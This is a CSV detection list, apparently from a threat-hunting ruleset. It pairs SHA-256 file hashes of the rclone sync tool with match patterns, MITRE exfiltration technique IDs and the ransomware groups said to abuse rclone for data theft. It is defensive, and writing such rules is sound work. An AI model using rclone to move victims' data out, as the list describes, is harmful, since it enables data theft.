"*42551d31c0028e2322dab5e6a26702990f03ca68e7c4c68f32cbee9dd0631a7c*",".{0,1000}42551d31c0028e2322dab5e6a26702990f03ca68e7c4c68f32cbee9dd0631a7c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*4278d9d0aa57b846f13198f9cb4ef1ccc8ab321333cf4b73c308c3406216bedd*",".{0,1000}4278d9d0aa57b846f13198f9cb4ef1ccc8ab321333cf4b73c308c3406216bedd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*427bb5079d04d1eb37eb67d56d2aae2d9e60f837c3abd410ade4c07cab895b7a*",".{0,1000}427bb5079d04d1eb37eb67d56d2aae2d9e60f837c3abd410ade4c07cab895b7a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*429ab13f98bcc8f07a1b320c2f9d89ff081facd016682ddfb73208fdcf41c9ce*",".{0,1000}429ab13f98bcc8f07a1b320c2f9d89ff081facd016682ddfb73208fdcf41c9ce.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*42efd51a6ecfbc09d747d57e7c8c9a056b984aae674c267b483fa776c0f35ace*",".{0,1000}42efd51a6ecfbc09d747d57e7c8c9a056b984aae674c267b483fa776c0f35ace.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*431c443be43fc659fd31b19c64026b55759664a44cf2e308be9c58029f80729a*",".{0,1000}431c443be43fc659fd31b19c64026b55759664a44cf2e308be9c58029f80729a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*43b55bc926924487614bedd1aed51dbc73ec39b5eadcf2ef8e9e10f6c88ec59f*",".{0,1000}43b55bc926924487614bedd1aed51dbc73ec39b5eadcf2ef8e9e10f6c88ec59f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*43cb85b6a163e9ab66491f8e694e092a075c3974a241815332073bc16ec8adbf*",".{0,1000}43cb85b6a163e9ab66491f8e694e092a075c3974a241815332073bc16ec8adbf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*43d1d270b11291f565e46b42c488c37e1259768f87348c66689c2e0b0351a4c3*",".{0,1000}43d1d270b11291f565e46b42c488c37e1259768f87348c66689c2e0b0351a4c3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*43e2c9b640eee24a3a4da058758392e5733dc2571c5cf5b1187116821987f0cd*",".{0,1000}43e2c9b640eee24a3a4da058758392e5733dc2571c5cf5b1187116821987f0cd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*4466b826446373956d48283e2f52cd0fc3e52e0a9d4c67cccc5ddeb5838940cd*",".{0,1000}4466b826446373956d48283e2f52cd0fc3e52e0a9d4c67cccc5ddeb5838940cd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*4485d53cfd05d5c8845a2c8ab222a87a236ab23fee8c6362d20813e797af2b40*",".{0,1000}4485d53cfd05d5c8845a2c8ab222a87a236ab23fee8c6362d20813e797af2b40.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*44941b5b0c0c3b9dfed32117a7d72c488a20e60e404ba4840489371a6af990df*",".{0,1000}44941b5b0c0c3b9dfed32117a7d72c488a20e60e404ba4840489371a6af990df.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*449748dbd27c349146664fe691ea0f2cc57748de0e42d08126fe455d51275400*",".{0,1000}449748dbd27c349146664fe691ea0f2cc57748de0e42d08126fe455d51275400.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*44a6a2ef723f7c63941136f85f6a757ef9c5a0d7d455f75ad9ec5a58abd62bdb*",".{0,1000}44a6a2ef723f7c63941136f85f6a757ef9c5a0d7d455f75ad9ec5a58abd62bdb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*450aed08c24729159e19afe354aba83bd88f31606765d83c6a8c91a062e49246*",".{0,1000}450aed08c24729159e19afe354aba83bd88f31606765d83c6a8c91a062e49246.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*458413bdd7a85cb8a19a7f955e25ac633fe1513f956b6bc09efd5ca51d44aa8a*",".{0,1000}458413bdd7a85cb8a19a7f955e25ac633fe1513f956b6bc09efd5ca51d44aa8a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*45aa2b0be897c25e45040ae8b45c93882f3c15802ce8be0ab09c3a54b95df10c*",".{0,1000}45aa2b0be897c25e45040ae8b45c93882f3c15802ce8be0ab09c3a54b95df10c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*45d5b7799b90d8d6cc2d926d7920383a606842162e41303f5044058f5848892c*",".{0,1000}45d5b7799b90d8d6cc2d926d7920383a606842162e41303f5044058f5848892c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*45ec732d50b2517dc2c860317a3bf79867634a8143e4a441a3e399434ad6c141*",".{0,1000}45ec732d50b2517dc2c860317a3bf79867634a8143e4a441a3e399434ad6c141.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*4615cb76b150bcc5934470afc6d899730cdc6c80be322d519874067f8370b3f9*",".{0,1000}4615cb76b150bcc5934470afc6d899730cdc6c80be322d519874067f8370b3f9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*462f891bb87bcfa4551769f696db8bb39d168f2086951bccf0bd5d02e906aa8b*",".{0,1000}462f891bb87bcfa4551769f696db8bb39d168f2086951bccf0bd5d02e906aa8b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*46805de0bffb415983feda5b60fc36618b3aa8622517bba3e565362caf2d3a0d*",".{0,1000}46805de0bffb415983feda5b60fc36618b3aa8622517bba3e565362caf2d3a0d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*46843aa0bde60a8caf19de891d80c68c51d85f36334f46f0477282fec1c6eb8c*",".{0,1000}46843aa0bde60a8caf19de891d80c68c51d85f36334f46f0477282fec1c6eb8c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*46894d7590536bd8edf120a558ab6044327bf8b04456af3fd6780eed0a8aeb53*",".{0,1000}46894d7590536bd8edf120a558ab6044327bf8b04456af3fd6780eed0a8aeb53.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*468a7286eb3df5e54e711ed56796e0b5d2ffe1d237677d4318c26b5f20f265d2*",".{0,1000}468a7286eb3df5e54e711ed56796e0b5d2ffe1d237677d4318c26b5f20f265d2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*46a5d26f4dcb3d1e7d52cd2c26739782837d48dde9fb7a0255f9ccbfc1092e47*",".{0,1000}46a5d26f4dcb3d1e7d52cd2c26739782837d48dde9fb7a0255f9ccbfc1092e47.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*46cb2aec929225e1d9c943333a1e117660c11fc3d490397142cf7182faff8535*",".{0,1000}46cb2aec929225e1d9c943333a1e117660c11fc3d490397142cf7182faff8535.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*46d99596923f252752f41d0efef2e3f37b40cce80771202b1cedefa608dae3dc*",".{0,1000}46d99596923f252752f41d0efef2e3f37b40cce80771202b1cedefa608dae3dc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*47ebf0df8afd0a6c51d8f213169f8e9b214514f0f2a615188ffdf534f9c8968a*",".{0,1000}47ebf0df8afd0a6c51d8f213169f8e9b214514f0f2a615188ffdf534f9c8968a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*48103d949e2b72562259d42401462ba19589a2e31676396d4fb631325e12501b*",".{0,1000}48103d949e2b72562259d42401462ba19589a2e31676396d4fb631325e12501b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*4811c2fc85e4397ae7670768608a717c044928138d1238e58bd28c038b7178ff*",".{0,1000}4811c2fc85e4397ae7670768608a717c044928138d1238e58bd28c038b7178ff.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*481e17864e25d9acaca14aefd04e0794d310b080474f34d8dad849fd64f4f8ac*",".{0,1000}481e17864e25d9acaca14aefd04e0794d310b080474f34d8dad849fd64f4f8ac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*48282c20b9dc641bf52f79d0312bfb3c4d676ec1b084b4cf6d43ebbffa5d7041*",".{0,1000}48282c20b9dc641bf52f79d0312bfb3c4d676ec1b084b4cf6d43ebbffa5d7041.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*486bb5da7eacdbf2778cf31594f38ba458b4cc47076d7014e20e92dc4e74df6f*",".{0,1000}486bb5da7eacdbf2778cf31594f38ba458b4cc47076d7014e20e92dc4e74df6f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*48faaec738d9bba59f0451dba768acb7af36e25f01690accb1f057efcfe97af0*",".{0,1000}48faaec738d9bba59f0451dba768acb7af36e25f01690accb1f057efcfe97af0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
